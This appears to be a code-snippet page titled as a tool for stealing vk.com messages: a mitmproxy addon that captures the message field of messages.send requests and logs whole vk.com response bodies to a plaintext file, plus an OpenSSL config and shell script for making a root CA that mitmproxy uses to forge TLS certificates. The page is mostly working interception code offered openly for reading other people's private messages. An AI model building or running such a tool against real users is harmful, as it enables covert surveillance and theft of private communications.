mitmproxy vk.com message stealing
from mitmproxy import http | |
def request(flow: http.HTTPFlow) -> None:
    """mitmproxy request hook: log the ``message`` field of ``messages.send`` calls.

    Flows whose pretty URL does not contain ``"messages.send"`` are ignored.
    For the rest, the message text is appended to ``requests.log`` in the
    current working directory, using the platform default text encoding.
    The log therefore holds decrypted message content in plain text and
    should be handled like the intercepted traffic itself.

    Args:
        flow: The intercepted HTTP flow; only ``flow.request`` is read.
    """
    # NOTE(review): the published listing was flattened to column 0. The
    # nesting below is the reading in which the if/elif/else chain switches
    # on Content-Type and the blank separator line closes every record;
    # confirm against the original file.
    if "messages.send" not in flow.request.pretty_url:
        return

    req = flow.request
    with open("requests.log", "a") as sink:
        if req.content:
            content_type = req.headers.get("Content-Type", "")
            if "application/x-www-form-urlencoded" in content_type:
                # Indexing raises KeyError when the form has no "message" key.
                message = req.urlencoded_form['message']
                if message:
                    sink.write("Данные формы (URL-encoded):\n")
                    sink.write(f"{message}\n")
            elif "multipart/form-data" in content_type:
                sink.write("Данные формы (multipart):\n")
                for key, value in req.multipart_form.items():
                    if key == "message":
                        sink.write(f"{key}: {value}\n")
            else:
                # Any other content type: the whole decoded body is logged.
                sink.write(f"Тело запроса: {req.text}\n")
        # Blank line separating one logged request from the next.
        sink.write("\n")
def response(flow: http.HTTPFlow) -> None:
    """mitmproxy response hook: log response bodies for hosts containing ``vk.com``.

    The host test is a substring match on ``flow.request.host``, so it also
    selects any other host name that merely contains ``"vk.com"``. Matching
    response bodies are appended, decoded as text, to ``requests.log`` in
    the current working directory. These bodies are complete API/page
    responses, so the log can contain more than message text.

    Args:
        flow: The intercepted HTTP flow; ``flow.request.host`` and
            ``flow.response`` are read.
    """
    # NOTE(review): nesting reconstructed from a flattened listing; the
    # trailing blank-line write is assumed to sit inside the ``with`` block
    # but outside the content check. Confirm against the original file.
    if "vk.com" not in flow.request.host:
        return

    with open("requests.log", "a") as sink:
        if flow.response.content:
            sink.write(f"Тело ответа: {flow.response.text}\n")
        # Blank line separating one logged response from the next.
        sink.write("\n")
Конфиг для генерации
# OpenSSL configuration for a self-signed root CA certificate.
# NOTE(review): presumably saved as ./root.cnf, the file the generation
# script on this page passes to `openssl req -config`; confirm.
#
# [ ca ] and [ CA_default ] are sections read by `openssl ca`. The script on
# this page only runs `openssl req`, so they look unused here.
[ ca ]
default_ca = CA_default
[ CA_default ]
default_md = sha256
# Settings for `openssl req`.
[ req ]
# Take the subject fields from the section below instead of prompting.
prompt = no
# Key size used only when `req` generates the key itself; the script on this
# page supplies an existing key with -key.
default_bits = 2048
distinguished_name = req_distinguished_name
# Extension section applied to the self-signed certificate (req -x509).
x509_extensions = v3_ca
# Subject (and, being self-signed, issuer) of the root certificate.
[ req_distinguished_name ]
stateOrProvinceName = US
localityName = US
organizationName = GSSIGN
organizationalUnitName = GSSIGN
commonName = rootCA
emailAddress = [email protected]
[ v3_ca ] # extensions section
# keyCertSign and cRLSign are the CA usages; digitalSignature and
# keyEncipherment additionally let the CA key act as an end-entity key.
keyUsage = critical, cRLSign, keyCertSign, digitalSignature, keyEncipherment
# Extended key usages placed on the CA certificate itself.
# NOTE(review): some validators treat EKU on a CA as a limit on what it may
# issue; confirm this list is intended.
extendedKeyUsage = serverAuth, clientAuth, emailProtection, timeStamping
# CA:TRUE without pathlen: the depth of chains below this root is not limited.
basicConstraints = critical, CA:TRUE
Скрипт для генерации:
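# Generate a self-signed root CA: private key (root.key), certificate
# (root.crt) and a combined key+certificate bundle (full.pem).
# Inputs: DAYS (certificate validity in days) and $2 (handed to openssl as
# the key passphrase source). Both are set outside the lines shown here.
echo "Generate root CA key ...";
# genpkey is called without a cipher option, so root.key is written
# unencrypted. The subshell umask makes a newly created key file readable by
# its owner only, without changing the umask for the rest of the script.
(umask 077; openssl genpkey -algorithm RSA -out root.key -pkeyopt rsa_keygen_bits:2048);
echo "Generate root CA certificate ...";
# Expansions are quoted so values cannot be word-split, and ${DAYS:?} stops
# with a clear message when DAYS is unset instead of letting openssl consume
# the next option as the day count.
# -nodes only affects keys that req creates, and -passin is only consulted
# for an encrypted key, so neither changes the result with this root.key.
# A passphrase given as pass:... is visible in the process list.
openssl req -x509 -new -nodes -key ./root.key -sha256 -days "${DAYS:?DAYS must be set}" -out ./root.crt -passin "pass:$2" -config ./root.cnf;
# full.pem contains the private key, so it gets the same owner-only mode
# when it is newly created.
(umask 077; cat ./root.key ./root.crt > ./full.pem);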
Из документации
При просмотре сертификата командой `openssl x509 -noout -text -in ~/.mitmproxy/mitmproxy-ca.pem` он должен иметь как минимум следующие расширения X509v3, чтобы mitmproxy мог использовать его для генерации сертификатов:
X509v3 extensions:
X509v3 Key Usage: critical
Certificate Sign
X509v3 Basic Constraints: critical
CA:TRUE